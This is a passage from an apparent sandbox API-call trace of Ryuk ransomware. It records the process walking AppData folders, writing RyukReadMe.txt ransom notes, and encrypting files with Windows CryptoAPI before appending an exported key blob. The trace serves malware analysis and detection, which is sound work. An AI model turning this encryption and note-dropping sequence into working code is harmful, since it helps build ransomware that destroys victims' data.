dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.799] GetLastError () returned 0x0 [0149.799] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0149.799] CloseHandle (hObject=0x19c) returned 1 [0149.800] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.800] SetLastError (dwErrCode=0x0) [0149.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.800] GetLastError () returned 0xb7 [0149.800] CloseHandle (hObject=0x19c) returned 1 [0149.800] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0149.800] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.800] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0149.800] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0149.800] SetLastError (dwErrCode=0x0) [0149.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.800] GetLastError () returned 0x0 [0149.800] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0149.801] CloseHandle (hObject=0x19c) returned 1 [0149.801] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.801] SetLastError (dwErrCode=0x0) [0149.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.802] GetLastError () returned 0xb7 [0149.802] CloseHandle (hObject=0x19c) returned 1 [0149.802] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0149.802] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.802] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0149.802] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0149.802] SetLastError (dwErrCode=0x0) [0149.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.802] GetLastError () returned 0x0 [0149.802] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0149.803] CloseHandle (hObject=0x19c) returned 1 [0149.803] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.803] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0149.803] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat", dwFileAttributes=0x80) returned 1 [0149.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.804] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=32768) returned 1 [0149.804] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=32768) returned 1 [0149.804] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x7ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.804] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0149.805] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.805] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0149.805] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0149.805] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.805] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x8000, lpOverlapped=0x0) returned 1 [0149.806] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0149.806] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x8000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x8010) returned 1 [0149.807] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.807] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x8010, lpOverlapped=0x0) returned 1 [0149.807] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0149.807] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0149.807] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0149.807] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0149.807] CloseHandle (hObject=0x19c) returned 1 [0149.823] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.827] CryptDestroyKey (hKey=0x3b8690) returned 1 [0149.827] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.827] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.827] SetLastError (dwErrCode=0x0) [0149.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.828] GetLastError () returned 0xb7 [0149.828] CloseHandle (hObject=0x19c) returned 1 [0149.828] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0149.828] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.828] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0149.828] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0149.828] SetLastError (dwErrCode=0x0) [0149.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.828] GetLastError () returned 0x0 [0149.828] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0149.829] CloseHandle (hObject=0x19c) returned 1 [0149.829] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0149.829] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0149.830] SetLastError (dwErrCode=0x0) [0149.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.830] GetLastError () returned 0xb7 [0149.830] CloseHandle (hObject=0x198) returned 1 [0149.830] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0149.830] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0149.830] SetLastError (dwErrCode=0x0) [0149.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.830] GetLastError () returned 0xb7 [0149.830] CloseHandle (hObject=0x194) returned 1 [0149.830] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.830] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.830] SetLastError (dwErrCode=0x0) [0149.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.830] GetLastError () returned 0xb7 [0149.830] CloseHandle (hObject=0x190) returned 1 [0149.830] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.830] SetLastError (dwErrCode=0x0) [0149.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.831] GetLastError () returned 0xb7 [0149.831] CloseHandle (hObject=0x190) returned 1 [0149.831] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.831] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.831] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.831] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.831] SetLastError (dwErrCode=0x0) [0149.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\mmc\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.831] GetLastError () returned 0x0 [0149.831] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0149.832] CloseHandle (hObject=0x190) returned 1 [0149.832] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.832] SetLastError (dwErrCode=0x0) [0149.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.832] GetLastError () returned 0xb7 [0149.832] CloseHandle (hObject=0x190) returned 1 [0149.833] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.833] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.833] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.833] SetLastError (dwErrCode=0x0) [0149.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.833] GetLastError () returned 0x0 [0149.833] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0149.834] CloseHandle (hObject=0x194) returned 1 [0149.834] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0149.834] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.834] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.834] SetLastError (dwErrCode=0x0) [0149.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.835] GetLastError () returned 0x0 [0149.835] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0149.835] CloseHandle (hObject=0x198) returned 1 [0149.835] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0149.842] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.842] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.842] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0149.842] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT", dwFileAttributes=0x80) returned 1 [0149.843] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.843] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=390656) returned 1 [0149.843] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=390656) returned 1 [0149.843] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x5f4de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.843] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0149.844] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.844] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0149.844] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0149.844] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.845] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5f600, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x5f600, lpOverlapped=0x0) returned 1 [0149.853] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0149.853] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x5f600, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x5f610) returned 1 [0149.855] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.856] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5f610, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x5f610, lpOverlapped=0x0) returned 1 [0149.857] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0149.857] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0149.857] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0149.857] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0149.857] CloseHandle (hObject=0x19c) returned 1 [0149.869] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.873] CryptDestroyKey (hKey=0x3b8690) returned 1 [0149.873] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.873] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0149.873] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0149.873] SetLastError (dwErrCode=0x0) [0149.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.874] GetLastError () returned 0x0 [0149.874] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0149.875] CloseHandle (hObject=0x198) returned 1 [0149.875] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0149.875] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.875] GetLastError () returned 0xb7 [0149.875] CloseHandle (hObject=0x194) returned 1 [0149.875] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.875] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.875] SetLastError (dwErrCode=0x0) [0149.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.875] GetLastError () returned 0xb7 [0149.875] 